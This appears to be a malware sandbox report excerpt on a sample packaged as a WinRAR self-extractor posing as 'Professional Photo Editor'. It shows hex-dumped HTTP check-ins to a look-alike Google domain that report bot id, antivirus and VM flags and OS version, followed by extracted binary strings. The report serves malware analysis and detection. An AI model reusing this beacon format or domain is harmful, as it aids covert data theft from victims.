0x00000050 (00080) 3d393626 6f733d35 2e312e32 3630302e =96&os=5.1.2600. 0x00000060 (00096) 33267a3d 34353826 68617368 3d437643 3&z=458&hash=CvC 0x00000070 (00112) 6e426a56 6a38494f 4d333341 394c664f nBjVj8IOM33A9LfO 0x00000080 (00128) 4764426b 6e6a7939 61577a41 4a464538 GdBknjy9aWzAJFE8 0x00000090 (00144) 4a783772 48745554 37765a36 317a6757 Jx7rHtUT7vZ61zgW 0x000000a0 (00160) 79672f77 35444a6b 6c2b7666 6232334b yg/w5DJkl+vfb23K 0x000000b0 (00176) 412b472f 36764234 372b7158 7a4f3435 A+G/6vB47+qXzO45 0x000000c0 (00192) 47633975 7a324b71 742b6b73 66204854 Gc9uz2Kqt+ksf HT 0x000000d0 (00208) 54502f31 2e310d0a 486f7374 3a20616e TP/1.1..Host: an 0x000000e0 (00224) 616c7973 74696373 2e676f6f 676c652e alystics.google. 0x000000f0 (00240) 636f6d0d 0a0d0a com.... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d31 31343526 XX0000&key=1145& 0x00000040 (00064) 61763d30 26766d3d 3026616c 3d302670 av=0&vm=0&al=0&p 0x00000050 (00080) 3d393626 6f733d35 2e312e32 3630302e =96&os=5.1.2600. 0x00000060 (00096) 33267a3d 34353826 68617368 3d437643 3&z=458&hash=CvC 0x00000070 (00112) 6e426a56 6a38494f 4d333341 394c664f nBjVj8IOM33A9LfO 0x00000080 (00128) 4764426b 6e6a7939 61577a41 4a464538 GdBknjy9aWzAJFE8 0x00000090 (00144) 4a783772 48745554 37765a36 317a6757 Jx7rHtUT7vZ61zgW 0x000000a0 (00160) 79672f77 35444a6b 6c2b7666 6232334b yg/w5DJkl+vfb23K 0x000000b0 (00176) 412b472f 36764234 372b7158 7a4f3435 A+G/6vB47+qXzO45 0x000000c0 (00192) 4763312f 69645077 4f446e71 63204854 Gc1/idPwODnqc HT 0x000000d0 (00208) 54502f31 2e310d0a 486f7374 3a20616e TP/1.1..Host: an 0x000000e0 (00224) 616c7973 74696373 2e676f6f 676c652e alystics.google. 0x000000f0 (00240) 636f6d0d 0a0d0a com....
Strings
strcatVirtualProtect . .. .. ..\a... w. W78.. I .. \ .CC 1993-%d Accept |;bI& Bro&wse... by Alexander Roshal bytes Cancel &Cancel Cannot create folder %s Cannot create %s Cannot open %s Close Confirm file replace Copyright CRC failed in %s DCRC failed in the encrypted file %s. Corrupt file or wrong password. Decline &Destination folder eRichEdit ErroraErrors encountered while performing the operation Extract Extracting files to %s folder$Extracting files to temporary folder Extracting from %s Extracting %s Extraction progress |f., File close error folder is not accessiblelSome files could not be created. H ((((( H h(((( H ~hRichEdit20W Install jmsctls_progress32 KERNEL32.DLL License LICENSEDLG RENAMEDLG Look at the information window for more details modified on mscoree.dll MS Shell Dlg 2 Next volume Not enough memory No to A&ll Packed data CRC failed in %s Please close all applications, reboot Windows and restart this installation\Some installation files are corrupt. Please download a fresh copy and retry the installation Read error Rename &Rename Rename file REPLACEFILEDLG Select destination folder Skipping %s STARTDLG The archive comment is corrupt The archive header is corrupt The file "%s" header is corrupt%The archive comment header is corrupt The following file already exists The required volume is absent2The archive is either in unknown format or damaged TITLE_BMP TITLE_BMP =Total path and file name length must not exceed %d characters Unexpected end of archive Unknown method in %s WinRAR self-extracting archive with this one? Would you like to replace the existing file Wrong password for %s&Write error. Probably the disk is full &Yes Yes to &All ^@@@@@ +----( +@-@+* !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~ ))020302130312131303131I13613373373373I67I37I6ILI7I7LIHLLIHLLLQLRLQRLRRRRQLLLIL5LLLLLLLLLRRLR>RLVRTRTRTTVTWWWWWWWWWaWWTWW`TWW`TW``WhTT`TW```T``Wh`h`hbhhc`h`h`h`hchhchhjhjhjhhjhkhkhkkhkkkhkkhkkhkkhkkikkhkhkkhkhkhhkhhjhjhhjhhhhch`hjhhhb`hhhahhahTW`ahWhbWha0 0A@@Ju 0_bOq(V.cnc>1 @|0l#_ 0 \@lN}Z3Q0 0MMQMSMM6" 0MXSYVM2( 0^plp_pp^L <0Q,j/ 0SSSSS 0Y^]^SM1( 1 \\)( .1.117O[ry~tmR. 1C!3Q#A 1!cKT +|<1NH 1SZZSN1 1U[\U7, -1%}Z. 1Z[]d[ZU7 1Zx2_o 2Aku+au 2Am!}1 @@+2C@BAC-CBDDA2A-A-@) ^-----+-2-D--D-BD6BDFHDD6DEA-( ;~2dvQ 2EKMGGMG2) 2los#T`s~ 2sZUSUZSNH. 2tSSUSSNH, 2yZYUYSZUNH1" 3~[\a\fZZd[aZZZZUO7L767717777HOU[dfWZO7777777O7OUagngeaaOOOO>OOOOTU`antvzuvu 3MJ6D2B--, 3MJJKMJ62 ,.3M[]]][Z]d]]d[\][[]d]deeeeeWO5/1LWgtttvvv 3~"n-Q 3[^^^^p^X3 3q#au=uA 3|QNaHq( 3XSXQG1 *3Yc { ""("")",".".".#........4.040.4015414154555555<57>5>7>7>7>L>7>L>L>R>L>R>LTR>LTR>R>R>R>R>R>R>R>R>LT>L>L>>L>L>L>L>5>7>7>5<57<555555514541414040.55LLW ;=4'&4w 46SSSRM6( (48saB{S $ '4999 %4hkjkk %%%'4>iowkW5 4(MPPKMJ62( ;4NI1,, ?4Odntv 59>bArzNooq +5F[uSDC 5Nmp=Y 5wwwWR5405TWiw ,-6-6D6-D6-6EHMMYZZ]d]]eeeempnmrprrrmrsrtttzvttvumnegef[degervvu 6'c=$8X *6DD6EIHKMQH1 6GKMXJF* 6hFx4" 6hFxFXvHV 6hFxVH 6hFxVHfXv 6hFxVIgYw 6hFxVXvHv 6JGMPMJSMSPF0 6SMQM0 6SSSJ1("= 6SSSQH1 6SSSSUQRNLU[d]Z\ZSZ\erry 6SY[SZR1 6S[ZYVQH1/ 6XZSQN6 6^[^ZZ]UH" 71}E8h 796IFYVDV 7d[da]dWN/ 7rrlU1 8$0feemgmggpmrrrrmnrrrtogeaaUWfnwzv 8##.5>aw '8''99=? '8%'999? '8~C)GT; 8xnL+U |9!)1\cIy;Y 9"7U[U7. '99;;9:;;4R>> 9$#dttyrma7 9]P"&= 9"Ulpme[7" ;9''$!!&#W 9wIK4} A|0l _ A}0l _ ((,-,A-26-E6HHNNSU[]didiememmrmrmrmmgmeigmemmrrrsvtv{u A[2b1C` @@@A--@+@-A@-@+ ^@AAA@2@A+-@--++@-@+-AADDC-( abcdefghijklmnopqrstuvwxyz ABCDEFGHIJKLMNOPQRSTUVWXYZ ^ACAC-D++-+++++++--BAGGEDA-* +AD--( ^+---A-DADDDADDAGDBDCDGB6DD-) #agdaU" AGGGKGGGGGGF( ahYxA@ An application has made an attempt to load the C runtime library incorrectly. AP}(vxT -A=Q2a"qR -a=q-a=qM -a=Q-a=qM - Attempt to initialize the CRT more than once. - Attempt to use MSIL code from this assembly during native code initialization August 'avtvzvzvttn[`1 aWaWAwA AwAWAwA AwQ l=q AxQ-a= a >z'Ga(@b (-BD6MMMYZ]Zede]dpedeeerrprrgmdgsrtrzv{~ (+BDD-+ *++----BDEIJMMMSQN3, )---+++B-E6-, BeginPaint b$i?-$Os> .\Blt| b?r1-a >bTRj5x @~bURk BxrsjqCm )c8P|j (c8zmStN cc?<4#! +CDGCEGGCGA( ChZ4POV <cjjc`4## CN3q#a CorExitProcess )CPCKGCPCG- CreateWindowExA - CRT not initialized CtLm(Ql }CUAq# ^D+@++ ^D2D2EGHKMGMMKGJMGPKMGMGQMMME- **D6MHQMSOH6H6NMMMNMSSS\\deee]eeemee[ZZZSZSSZZd]gptttzrvvt{zz @.data DBCDA+ (d^BoH}1 DC9IeyV DcISdG ^-D-D--+A+A-DAADABDA2AAD2GDD dddd, MMMM dd, yyyy )DDHMHMEH- December DecodePointer DefWindowProcA DeleteCriticalSection DFKEGGEEGEF- -DGGED2A) DGGGEGDD) DGMGHMGMKM36( DGPKPPKJD DispatchMessageA DJJPKPGKMPJA( DJMKJMJM6( _D*^k5 DOMAIN error D]P1M!U dq2*87 [dR(O1 dsyty~yrQ" =D]T}d]t= DtNIf| dvtfDV eGUOE7u eMk$<|e EncodePointer EnterCriticalSection EQ-a=qM essxyyseQ" \e!x9Q ExitProcess ]e/"Z~ &E]ZH.` e'z; L ][f[da[edWd[ef[aeeaefaeeggeggegigggnggennogrnrnnorrnurutu February F[%:HXv -f?JUu%( -FKFEGHJPKMM- - floating point support not loaded FlsAlloc FlsFree FlsGetValue FlsSetValue :*fmr F:{pbQ FreeEnvironmentStringsA FreeEnvironmentStringsW Friday f+T|]P2 Fu8g+W ;$fvk`T>bik fwbqq> FxVH$Xv {/G2fJ G@CCCCCGB+ GCKCKKPGC0 (GCKGKGKDGD-( GDI32.dll GetACP GetActiveWindow GetCommandLineA GetCPInfo GetCurrentProcess GetCurrentProcessId GetCurrentThreadId GetEnvironmentStrings GetEnvironmentStringsW GetFileType GetLastActivePopup GetLastError GetLocaleInfoA GetMessageA GetModuleFileNameA GetModuleHandleA GetModuleHandleW GetOEMCP GetProcAddress GetProcessHeap GetProcessWindowStation GetStartupInfoA GetStdHandle GetStringTypeA GetStringTypeW GetSystemTimeAsFileTime GetTickCount GetUserObjectInformationA GetVersionExA Gffff` ?ggcib`5# .GJ-s2 )GKCPKGD( Glxxsxsxspxspsxysyxytyzyyyyytytyyysyyyyyrsrpppp]]^\Y^Z^]^d]pppprprxrssyy{~{~ g= Nu6AFFK (GPKPPJA( GXPXPK3( ; h`5#8 hAM"}cR HeapAlloc HeapCreate HeapFree HeapReAlloc HeapSize _HGDGDKEFEEGJJGMGMKGMGEKGMKH2) -HGGM6 HH:mm:ss HLY,y<y HMSPMSM6( Hq(E1Y h$s2HcX HSRM60 h]::TAF hU,[<Z HXMSXR1 HYSSNH) HZ.SH` HZ^ZQ1 %I1!ls ?:I7JF iaeaefeaffedageigiegegigeigggingenggrrnnmnrnnounroouvuuuuuuzuv >idxyQ iGoWVbH i*gQLuH\ IMQSSYUSSUM6 InitializeCriticalSectionAndSpinCount InterlockedDecrement InterlockedIncrement I^^^]p^^[6 IsDebuggerPresent IsValidCodePage |Iu*93 i),x\h ixysyyymU i\y, < ] i+y; K IYYQ2,""06LNIOX[]pepmreeZN. izyzyv~mO" j1SSQMN1 j>/& 8 JanFebMarAprMayJunJulAugSepOctNovDec January jchOOUSMMM- =jEiw: jG)iqf j.IH7, ?jjjh=<# j@j ^V Jl^pp^ppZ7 JRGc!x JSXJD0 Jv=a-Q k=--<. k`/! 8 k?<9<; kb>><>><>```k K%c fU kernel32.dll KERNEL32.dll %kfWh= kh><<=`hk ?,KJMSJMJH* knG>mN}^ k'o&x = KPKPXK3) KQMD32)( Kw;f*V >kXOmm )KXXXXPM( l2-D-( {L5D0y L`\9l)|4 L ()B) }+ lBt2~" nA LCMapStringA LCMapStringW lD6-6-----*B--6B6DHHMEMHHD6--* >lE5VH8 LeaveCriticalSection Lexepe]U0: lG2D2( Lh\|l[|V LI\Yli|9 Ll.| ] Lm\xlG|W LoadAcceleratorsA LoadLibraryA LpxlU. L%\Tl)|9 L}\tl_|K l)zxOvQ "m}}}} M!]0-@=S M#]2-B=R M&]5-E=U m6$FnW< M+]7-G{ MessageBoxA Microsoft Visual C++ Runtime Library Mlpppqpm[3 MM/dd/yy Monday MPSSMQH. Mq<c.m -MQSG6 )MQSNS1 #MSML61( MUI2/Q MultiByteToWideChar MXXSKI- MY[XZSM1" {n\>' ] N4z;c* n8t$D na*_n#U N[]d[]]\\aZRNUZ]dZL1" NEK7k} NeZa]d[U7" njb,V< - not enough space for arguments - not enough space for environment - not enough space for locale information - not enough space for lowio initialization - not enough space for _onexit/atexit table - not enough space for stdio initialization - not enough space for thread data November (:^NPG @nP~`YgI NQSSSNSSMSMMMMHEMSMSSZYd[dd[degpeemgeedZYUSOMMSMSZZZ[dZZYUSMQMUSS]grv nrJymBtth% n+>RNS^ ns~;NW^ ntdll.dll N[ZZR7" NZZSU6, o6}CsV October "Odggrrnrgorrrotttutvuz ?&#Odgtuutuututzvuz Odmgenmernmrnrrrorttrtvurvuvvzv OedaeUO1, Ofed]aUO4" "Ofgiorrurrnvutu of*,tS oicJci O#Q"c0r }O'>-ttO owh# = Owwwwp P|Cju[eH pe6C!'m &pfPfp& pGGDGIMGMMKMJMJMKQMSJMKMSPSKMJ- Please contact the application's support team for more information. p(pHp(p PPPPPPPP )PPXSXQ2( Professional Photo Editor (PPE) Program: <program name unknown> )pthJ8 - pure virtual function call PW)r<0 )PXPXPPC) pxsxsxs]L |pYl-p )PYXXXS3 (q}1rH Q4a%qZ )Q9)CS^ Q-a=qL Q-a=qM Q'a=qM Q-aX"!`1 qED2D( qJ2H2( :@_QKe qMDHD) @qMHIH) &)]qppxqx]I QSH616INZZ[Z[Zd]YeZ]epre[O. QSXSQN0 ,QSY[X]]Z7. QueryPerformanceCounter qz0}h} rcbCRc R}Cms]cM `.rdata rDbT lB Rectangle RegisterClassExA RIVX(G)ov >rozvvzw ,[rpr[U7/" ]$rS-2= RtlUnwind runtime error Runtime Error! rYbaR)|9 r{yV_0 RZ1" = ;S1\!6t >s1ccF s1c#TdS" Saturday SCRr-j s"c\`|t SECdAqL S]e[H,# Sepp[L" September SetHandleCount SetLastError SetUnhandledExceptionFilter S{=&\F sHMHMRSMMMQMJMKMJKJJMMQQSSSSMSJM6H66D6---( ShowWindow SIBYriby SING error sJNMNH( .Sl}M3 ]sMc~P`O SR&2vP sSMMM1 +sSQMQH0 "SSYYSYYZSYUML6I7HLH7HNSZ^Z][d]epemprmporrrsrsrsttteWVaenstrrmrgrpnrtt SSZSS6, strstr Sunday SunMonTueWedThuFriSat SunSystemClass (SXSPXQ6 s{ymO. "SYXSXS6 S[]\]\[ZR6= ~ta7<a tehu)B TerminateProcess This application has requested the Runtime to terminate it in an unusual way. This indicates a bug in your application. This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain. !This program cannot be run in DOS mode. Thursday < tK< tG TLOSS error TlsAlloc TlsFree TlsGetValue TlsSetValue {T.MGtT tp8Oi0 TranslateAcceleratorA TranslateMessage t"SS9] [tttvvtmWO" {tt{vv ~{ttytt{~ym3 t$<"u 3 Tuesday ;t$,v- tvrtrtvu t+WWVPV ]u !}B uBhn&B u~d!wYD U]eeedpeeneepeermpgeeaR7 #Uef[U7/, U{EhvfXD U{EhvXfI U Ex7k'U @UFspb=/ UFxgzTkE ~$}uHeoc uLeZUhQaF Umrsyztsnorvzv~vzvzv{~ - unable to initialize heap - unable to open console device - unexpected heap error - unexpected multithread lock error UnhandledExceptionFilter {uogaO UpdateWindow UprpmpZO1,/5R[daZWemt{ UQPXY]Y[ URPQQh WB USER32.dll USER32.DLL usHF<s UsQS%33 {utreddeegszvzw Uu0N `%'b UxFV|Rm@ UyaIy4 U]Y[]YS1" UZ\ZZ\ZZUOL.9 vcO#8% #.V>Gf0 VirtualAlloc VirtualFree v N+D$ @|Vniu x%N VsfO}6hFxVHfXv VSYZQM. vXuo]: w\3;ns W|AYOx. w]cUSBCrVrL Wednesday >>W)f*v w%,g&<P| W%g+|X%u .wi}~c WideCharToMultiByte WiT54" |Wi-yid%r+ w/Mrd% WriteFile wSSSSMH. wuknkoo wvnkgcaT74//" w`Xj%rT ' WyGVHVhG <#WZU7' X@@@@@ x0`@_ X]9VW Xc[yI"yZ XDi\81 &Xe@n_ =$XHKR@ xL0#QdW XoH2pUtZ .xVHfXF ~~~y~~ y0fhk- "y8w=Xk Y9.J%$ y+eipy yGMQMMMGHEED-+*******-D-B6DGH6D.*,02HMMMMHFHDF6*( !yGrE-g y(hlX|! -y-I%> Y,i<y( Y,i;y3 y+JiG!z Yl(4$- }}y{lF y.o#BayS }|}{|y|qyxyxl+ y~SZ;3=Tb >=Yt1j }}||y|y|~}} {~yye3 Y%Yl)w( }{~yyyssp3 }{}|{yyyysl2 ~{~~yzyl3 >]z;}+ $]{~z~ *$.}z+ Z0r4et z2p</M z6$^ n Z[d]ddZU1 '.Z]eeeedeeeeegmemdedZO1 z@jP$@ z$Kl)|9 Zpeme[W1 ZrAoq\bJ #ZrmeZTH." z{ttmr]Z[ZSZSZ[eemrgiaW<<144<>`c zTyB~msc Zwf0+D ~{~zyyz{z} ZZWZWdd[ZeZfaZdadaZfWdZf[adaeageefidififfiggeginrgnumnnnonuounvuut #ZZ[ZH/ ZZZZWZZZZZZUN1.